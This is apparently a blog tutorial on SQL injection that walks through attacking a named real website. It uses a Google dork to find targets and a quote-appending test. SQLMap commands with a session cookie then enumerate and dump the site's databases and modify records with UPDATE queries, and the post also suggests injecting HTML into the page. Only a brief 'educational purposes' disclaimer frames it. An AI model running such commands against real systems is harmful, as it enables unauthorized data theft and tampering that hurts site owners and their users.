Hacking remote databases using SQL injection

Understanding SQL Injection

 

 

SQL injection is a cyber attack technique where malicious SQL queries are inserted into an application’s query string, targeting websites vulnerable to this exploit. This method can be used to gain unauthorized access to a website’s data, deface the site, tamper with existing data, and more. SQL injection attacks pose severe threats to the security of websites, potentially exposing sensitive data and harming stakeholders.

In this blog, we will demonstrate how to identify a website susceptible to SQL injection and exploit this vulnerability using a tool called SQLMap. We’ll start by using Google dorks to locate a vulnerable site. If you’re unfamiliar with Google dorks, please read my previous blog.

 

Using Google Dorks to Find Vulnerable Sites

 

A simple Google dork to identify potential SQL injection vulnerabilities is:

 

inurl:index.php?id=

 

This query returns numerous search results, many of which might be vulnerable if they do not properly sanitize the query string. As an example, let’s investigate one of the search results.

 

Quick Check for SQL Injection Vulnerability

 

From the search results, I found a site, karaoke.co.nz, that is vulnerable to SQL injection. By visiting:

 

http://karaoke.co.nz/items/index.php?id=37

 

and appending a single quote at the end of this URL:

 

http://karaoke.co.nz/items/index.php?id=37'

 

we can see an error indicating improper sanitization of query strings:

 

Unable to query local database to select Identifier
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 select * from Category where Identifier = 37'

 

 

This confirms the site’s vulnerability. Below is a partial dump of one of the database tables from this site.

 

Using SQLMap

 

To exploit this vulnerability, we’ll use SQLMap. First, download and install Python from here. Then, download and install SQLMap from here.

 

Once installed, navigate to the SQLMap directory and run the following command to familiarize yourself with SQLMap:

 

sqlmap.py --help

 

This command provides a detailed list of options available in SQLMap. Here are some key options:

 

  • -u URL, --url=URL: Target URL (e.g., “http://www.site.com/vuln.php?id=1“)
  • -g GOOGLEDORK: Process Google dork results as target URLs
  • --data=DATA: Data string to be sent through POST
  • --cookie=COOKIE: HTTP Cookie header value
  • --random-agent: Use randomly selected HTTP User-Agent header value
  • --proxy=PROXY: Use a proxy to connect to the target URL
  • --tor: Use Tor anonymity network

 

Dumping Databases with SQLMap

 

To dump all the databases of the vulnerable site, use the following command:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

 

This will return the database names, such as claireg_karaoke and information_schema.

 

To get a list of tables and other diagnostic data, use:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D information_schema --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

 

Once we have the table names, we can retrieve the column names:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke -T <table_name> --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

 

To dump the values of the columns, use:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke -T <table_name> --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dump

 

Changing Database Contents with SQLMap

 

 

In addition to dumping database contents, SQLMap allows you to modify the data in the database. This can be done using SQL injection to execute arbitrary SQL commands.

 

To update a specific value in the database, you can use the --sql-query option. For example, to update a value in a table:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE <table_name> SET <column_name>='new_value' WHERE <condition>"

 

For example, if you want to change the username of a user with id=1 in a users table:

 

python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE users SET username='new_username' WHERE id=1"

 

Exploiting the Vulnerability Further

 

Besides dumping and modifying databases, you can also manipulate the query string to change the HTML webpage. Since the website fails to sanitize the query string, you can inject HTML or other content.

 

Disclaimer

 

The information provided here is for educational purposes only. Any unethical use of this information is not our responsibility.

 

Follow us on :-

 

Facebook: https://fb.com/skillcef

Linkedin: https://linkedin.com/company/skillcef

 

 

Happy hacking!

skillcef

Skillcef admin responsible for creative content idea generation and publishing

Search


Categories

Recent Posts

Tags